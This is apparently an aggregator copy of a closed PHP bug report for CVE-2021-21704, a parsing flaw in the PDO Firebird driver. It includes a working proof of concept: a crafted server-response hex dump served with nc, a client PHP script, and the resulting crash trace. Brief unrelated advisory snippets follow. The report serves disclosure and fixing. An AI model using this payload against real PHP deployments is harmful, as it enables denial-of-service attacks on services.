Headline

CVE-2021-21704: PHP :: Sec Bug #76450 :: SIGSEGV in firebird_stmt_execute

In PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using Firebird PDO driver extension, a malicious database server could cause crashes in various database functions, such as getAttribute(), execute(), fetch() and others by returning invalid response data that is not parsed correctly by the driver. This can result in crashes, denial of service or potentially memory corruption.

3 years ago

CVE

Open in Source

#sql #linux #dos #git #php

Sec Bug #76450

SIGSEGV in firebird_stmt_execute

Submitted:

2018-06-11 20:02 UTC

Modified:

2021-06-28 04:40 UTC

From:

trichimtrich at gmail dot com

Assigned:

stas (profile)

Status:

Closed

Package:

PDO Firebird

PHP Version:

7.3.0alpha1

OS:

Private report:

CVE-ID:

2021-21704

[2018-06-11 20:02 UTC] trichimtrich at gmail dot com

Description:

A bug in pdo_firebase module allows a malicious firebase server or man-in-the-middle attacker to crash PHP.

bug in the result parsing of “exec procedure” in statement query. the response is not validated before caculation leads to crash or hang php forever.

Vulnerable code in: \php-src\ext\pdo_firebird\firebird_statement.c: 134 if (result[0] == isc_info_sql_records) { 135: unsigned i = 3, result_size = isc_vax_integer(&result[1], 2); 136 while (result[i] != isc_info_end && i < result_size) { 137: short len = (short) isc_vax_integer(&result[i + 1], 2); 138 if (result[i] != isc_info_req_select_count) { 139: affected_rows += isc_vax_integer(&result[i + 3], len); 140 } 141 i += len + 3;

result_size is not verified len uses short type, that we can set len = -3 and make PHP hangs forever.

Test script:

$ xxd stmt_exec_procedure.bin 00000000: 0000 005e ffff 800f 0000 0001 0000 0005 …^… 00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41 …Legacy_A 00000020: 7574 6800 0000 0000 0000 0000 0000 005c uth…\ 00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41 …Legacy_A 00000040: 7574 6800 0000 0000 0000 0000 0000 0009 uth… 00000050: 0000 0000 0000 0000 0000 0000 0000 0000 … 00000060: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000070: 0000 0001 0000 0000 0000 0000 0000 0000 … 00000080: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000090: 0000 0002 0000 0000 0000 0000 0000 0000 … 000000a0: 0000 0001 0000 0000 0000 0000 0000 0009 … 000000b0: 0000 0000 0000 0000 0000 0000 0000 001f … 000000c0: 1504 0008 0000 001b 0400 0200 0000 0507 … 000000d0: 0400 0000 0000 0407 0400 0000 0000 0100 … 000000e0: 0000 0001 0000 0000 0000 0000 0000 0009 … 000000f0: 0000 0001 0000 0000 0000 0000 0000 0000 … 00000100: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000110: 0000 0002 0000 0000 0000 0000 0000 0021 …! 00000120: 17ff ff0f feff 0000 0000 1004 0000 0000 … 00000130: 000d 0400 0000 0000 0e04 0000 0000 0002 … 00000140: 0100 0000 0000 0001 0000 0000 0000 0000 … 00000150: 0000 0009 0000 0000 0000 0000 0000 0000 … 00000160: 0000 0000 0000 0001 0000 0000 0000 0000 … 00000170: 0000 0009 ffff ffff 0000 0000 0000 0000 … 00000180: 0000 0000 0000 0001 0000 0000 0000 0000 … 00000190: 0000 0009 0000 0000 0000 0000 0000 0000 … 000001a0: 0000 0000 0000 0001 0000 0000 0000 0000 … 000001b0: 0000 0009 0000 0000 0000 0000 0000 0000 … 000001c0: 0000 0000 0000 0001 0000 0000 0000 0000 …

$ nc -lvp 3050 < stmt_exec_procedure.bin

$ cat fire_stmt_exec.php <?php $dsn = 'firebird:dbname=localhost:employee;charset=utf8;’; $username = 'SYSDBA’; $password = 'masterkey’;

$dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]); $sql = "EXECUTE PROCEDURE test_proc 123"; $query = $dbh->prepare($sql); $query->execute(); ?>

Expected result:

No crash No hang

Actual result:

$ ./php fire_stmt_exec.php ASAN:DEADLYSIGNAL ================================================================= ==5413==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd68135687 (pc 0x000000cdbf9d bp 0x7ffd6812c1b0 sp 0x7ffd6812c060 T0) #0 0xcdbf9c in firebird_stmt_execute (/mnt/hgfs/share/htdocs/php+0xcdbf9c) #1 0xcc55eb in zim_PDOStatement_execute (/mnt/hgfs/share/htdocs/php+0xcc55eb) #2 0x12e1872 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (/mnt/hgfs/share/htdocs/php+0x12e1872) #3 0x1212bcf in execute_ex (/mnt/hgfs/share/htdocs/php+0x1212bcf) #4 0x121320b in zend_execute (/mnt/hgfs/share/htdocs/php+0x121320b) #5 0x11175c0 in zend_execute_scripts (/mnt/hgfs/share/htdocs/php+0x11175c0) #6 0xfa4878 in php_execute_script (/mnt/hgfs/share/htdocs/php+0xfa4878) #7 0x1412cc4 in do_cli (/mnt/hgfs/share/htdocs/php+0x1412cc4) #8 0x1410e67 in main (/mnt/hgfs/share/htdocs/php+0x1410e67) #9 0x7f4208d6d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x43d878 in _start (/mnt/hgfs/share/htdocs/php+0x43d878)

SUMMARY: AddressSanitizer: stack-overflow (/mnt/hgfs/share/htdocs/php+0xcdbf9c) in firebird_stmt_execute ==5413==ABORTING

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2018-06-11 20:05 UTC] [email protected]

-Assigned To: +Assigned To: lwe

[2018-06-11 21:19 UTC] trichimtrich at gmail dot com

PoC hangs PHP

$ xxd stmt_exec_procedure.bin 00000000: 0000 005e ffff 800f 0000 0001 0000 0005 …^… 00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41 …Legacy_A 00000020: 7574 6800 0000 0000 0000 0000 0000 005c uth…\ 00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41 …Legacy_A 00000040: 7574 6800 0000 0000 0000 0000 0000 0009 uth… 00000050: 0000 0000 0000 0000 0000 0000 0000 0000 … 00000060: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000070: 0000 0001 0000 0000 0000 0000 0000 0000 … 00000080: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000090: 0000 0002 0000 0000 0000 0000 0000 0000 … 000000a0: 0000 0001 0000 0000 0000 0000 0000 0009 … 000000b0: 0000 0000 0000 0000 0000 0000 0000 001f … 000000c0: 1504 0008 0000 001b 0400 0200 0000 0507 … 000000d0: 0400 0000 0000 0407 0400 0000 0000 0100 … 000000e0: 0000 0001 0000 0000 0000 0000 0000 0009 … 000000f0: 0000 0001 0000 0000 0000 0000 0000 0000 … 00000100: 0000 0001 0000 0000 0000 0000 0000 0009 … 00000110: 0000 0002 0000 0000 0000 0000 0000 0021 …! 00000120: 17ff ff0f fdff 0000 0000 1004 0000 0000 … 00000130: 000d 0400 0000 0000 0e04 0000 0000 0002 … 00000140: 0100 0000 0000 0001 0000 0000 0000 0000 … 00000150: 0000 0009 0000 0000 0000 0000 0000 0000 … 00000160: 0000 0000 0000 0001 0000 0000 0000 0000 … 00000170: 0000 0009 ffff ffff 0000 0000 0000 0000 … 00000180: 0000 0000 0000 0001 0000 0000 0000 0000 … 00000190: 0000 0009 0000 0000 0000 0000 0000 0000 … 000001a0: 0000 0000 0000 0001 0000 0000 0000 0000 … 000001b0: 0000 0009 0000 0000 0000 0000 0000 0000 … 000001c0: 0000 0000 0000 0001 0000 0000 0000 0000 …

[2018-06-28 08:31 UTC] trichimtrich at gmail dot com

any update for this one?

[2021-04-30 12:12 UTC] [email protected]

-Status: Assigned +Status: Verified -Assigned To: lwe +Assigned To: cmb

[2021-05-05 12:54 UTC] [email protected]

-Assigned To: cmb +Assigned To: stas

[2021-06-21 05:10 UTC] [email protected]

-CVE-ID: +CVE-ID: 2021-21704

[2021-06-21 06:22 UTC] [email protected]

-Private report: No +Private report: Yes

[2021-06-28 04:41 UTC] [email protected]

-Status: Verified +Status: Closed

Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.

2 years ago

Packet Storm

Open in Source

#vulnerability #web #mac #linux #php

CVE-2016-4343: PHP: PHP 7 ChangeLog

The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.